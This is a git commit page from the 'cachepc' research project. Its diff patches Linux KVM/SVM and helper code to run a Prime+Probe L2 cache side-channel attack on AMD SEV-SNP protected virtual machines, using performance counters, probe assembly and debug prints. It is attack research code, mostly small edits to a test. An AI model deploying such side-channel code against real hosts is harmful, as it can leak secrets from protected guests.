cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit 576e8dc70825a04af3ac9890491d348959bf19ce
parent 8dc6462e70009c0bbcf0bbfcfd2d4494d3772580
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  4 Aug 2022 10:59:55 +0200

Vincent' working single eviction test

Diffstat:
M.gitignore | 1+
MMakefile | 0
Mpatch.diff | 23+++++++++++++----------
Mread.c | 2++
Msrc/asm.h | 10+++++-----
Msrc/cachepc.c | 6+++---
Msrc/cachepc.h | 15+++++++++++----
Msrc/util.c | 0
Msrc/util.h | 0
9 files changed, 35 insertions(+), 22 deletions(-)

diff --git a/.gitignore b/.gitignore @@ -3,3 +3,4 @@ push.sh *.o.cmd *.o read +.vscode diff --git a/Makefile b/Makefile diff --git a/patch.diff b/patch.diff @@ -24,7 +24,7 @@ index b804444e16d4..c94f8c4460f1 100644 obj-$(CONFIG_KVM) += kvm.o obj-$(CONFIG_KVM_INTEL) += kvm-intel.o diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c -index 7b3cfbe8f7e3..71697d08e9e4 100644 +index 7b3cfbe8f7e3..f9a6b37eb36a 100644 --- a/arch/x86/kvm/svm/svm.c +++ b/arch/x86/kvm/svm/svm.c @@ -2,6 +2,8 @@ @@ -36,7 +36,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 #include "irq.h" #include "mmu.h" #include "kvm_cache_regs.h" -@@ -3785,8 +3787,18 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, +@@ -3785,8 +3787,19 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) { @@ -48,7 +48,8 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 + struct vcpu_svm *svm; + + printk(KERN_WARNING "CachePC: svm_cpu_enter_exit()\n"); -+ ++ printk(KERN_WARNING "Vincent CachePC: svm_cpu_enter_exit()\n"); ++ cachepc_init_counters(); + if (!ctx) ctx = cachepc_get_ctx(L1); + if (!ds) ds = cachepc_prepare_ds(ctx); @@ -56,7 +57,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX]; svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP]; svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP]; -@@ -3835,8 +3847,14 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) +@@ -3835,8 +3848,15 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) */ x86_spec_ctrl_set_guest(svm->spec_ctrl, svm->virt_spec_ctrl); @@ -66,12 +67,13 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 + cachepc_probe(head); + //cachepc_print_msrmts(head); ++ printk(KERN_WARNING "Vincent: Saving measurements\n"); + cachepc_save_msrmts(head); + /* * We do not use IBRS in the kernel. If this vCPU has used the * SPEC_CTRL MSR it may have left it on; save the value and -@@ -3912,6 +3930,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) +@@ -3912,6 +3932,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu) if (is_guest_mode(vcpu)) return EXIT_FASTPATH_NONE; @@ -81,7 +83,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644 } diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c -index 2541a17ff1c4..757128b13fe5 100644 +index 2541a17ff1c4..1c3c3b63baba 100644 --- a/virt/kvm/kvm_main.c +++ b/virt/kvm/kvm_main.c @@ -51,6 +51,9 @@ @@ -122,7 +124,7 @@ index 2541a17ff1c4..757128b13fe5 100644 __visible bool kvm_rebooting; EXPORT_SYMBOL_GPL(kvm_rebooting); -@@ -4765,12 +4782,94 @@ static void check_processor_compat(void *data) +@@ -4765,12 +4782,95 @@ static void check_processor_compat(void *data) *c->ret = kvm_arch_check_processor_compat(c->opaque); } @@ -178,7 +180,7 @@ index 2541a17ff1c4..757128b13fe5 100644 + cacheline *head; + cacheline *ptr; + -+ ptr = cachepc_prepare_victim(cachepc_ctx, 5); ++ ptr = cachepc_prepare_victim(cachepc_ctx, 48); + head = cachepc_prime(cachepc_ds); + cachepc_victim(ptr); + cachepc_probe(head); @@ -212,6 +214,7 @@ index 2541a17ff1c4..757128b13fe5 100644 int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, struct module *module) { ++ printk(KERN_WARNING "Vincent: KVM Init called\n"); struct kvm_cpu_compat_check c; - int r; - int cpu; @@ -219,7 +222,7 @@ index 2541a17ff1c4..757128b13fe5 100644 r = kvm_arch_init(opaque); if (r) -@@ -4848,6 +4947,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, +@@ -4848,6 +4948,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align, r = kvm_vfio_ops_init(); WARN_ON(r); @@ -240,7 +243,7 @@ index 2541a17ff1c4..757128b13fe5 100644 return 0; out_unreg: -@@ -4872,6 +4985,12 @@ EXPORT_SYMBOL_GPL(kvm_init); +@@ -4872,6 +4986,12 @@ EXPORT_SYMBOL_GPL(kvm_init); void kvm_exit(void) { diff --git a/read.c b/read.c @@ -17,6 +17,8 @@ main(int argc, const char **argv) assert(len == sizeof(counts)); for (i = 0; i < 64; i++) { + //printf("%d %hu\n", i, counts[i]); + //continue; if (i % 16 == 0 && i) printf("\n"); if (counts[i] > 0) diff --git a/src/asm.h b/src/asm.h @@ -36,7 +36,7 @@ cachepc_readpmc(uint64_t event) : "c"(event) ); - return ((uint64_t) hi << 32) | lo; + return ((uint64_t) hi << 32) | (uint64_t)lo; } void @@ -58,7 +58,7 @@ cachepc_lfence(void) ); } -void +inline void cachepc_sfence(void) { asm volatile( @@ -67,7 +67,7 @@ cachepc_sfence(void) ); } -void +inline void cachepc_mfence(void) { asm volatile( @@ -76,7 +76,7 @@ cachepc_mfence(void) ); } -void +inline void cachepc_readq(void *p) { asm volatile ( @@ -85,7 +85,7 @@ cachepc_readq(void *p) ); } -void +inline void cachepc_victim(void *p) { cachepc_mfence(); diff --git a/src/cachepc.c b/src/cachepc.c @@ -24,10 +24,10 @@ cachepc_init_counters(void) * * 6 slots total */ - + reg_addr = 0xc0010200; - event_no = 0x64; - event_mask = 0x08; + event_no = 0x64;//0x29;//0x64; + event_mask = 0x08; //0x07; //0x08; event = event_no | (event_mask << 8); event |= (1ULL << 17); /* OS (kernel) events only */ event |= (1ULL << 22); /* enable performance counter */ diff --git a/src/cachepc.h b/src/cachepc.h @@ -103,6 +103,7 @@ cachepc_probe(cacheline *start_cl) { uint64_t pre1, pre2; uint64_t post1, post2; + volatile int i = 0; cacheline *next_cl; cacheline *curr_cl; @@ -112,6 +113,11 @@ cachepc_probe(cacheline *start_cl) cachepc_cpuid(); cachepc_mfence(); + pre1 = cachepc_readpmc(L2_HIT_CNTR); + pre2 = cachepc_readpmc(L2_MISS_CNTR); + + cachepc_cpuid(); + cachepc_mfence(); asm volatile( "mov 8(%[curr_cl]), %%rax \n\t" // +8 "mov 8(%%rax), %%rcx \n\t" // +16 @@ -130,13 +136,13 @@ cachepc_probe(cacheline *start_cl) cachepc_cpuid(); cachepc_mfence(); - pre1 = cachepc_readpmc(L2_HIT_CNTR); - pre2 = cachepc_readpmc(L2_MISS_CNTR); cachepc_cpuid(); cachepc_mfence(); - - msleep(100); + + //msleep(100); + //for(i=0; i<100000; ++i){ + //} post1 = cachepc_readpmc(L2_HIT_CNTR); cachepc_cpuid(); @@ -147,6 +153,7 @@ cachepc_probe(cacheline *start_cl) curr_cl->count = 0; curr_cl->count += post1 - pre1; curr_cl->count += post2 - pre2; + curr_cl = next_cl; } while (__builtin_expect(curr_cl != start_cl, 1)); return curr_cl->next; diff --git a/src/util.c b/src/util.c diff --git a/src/util.h b/src/util.h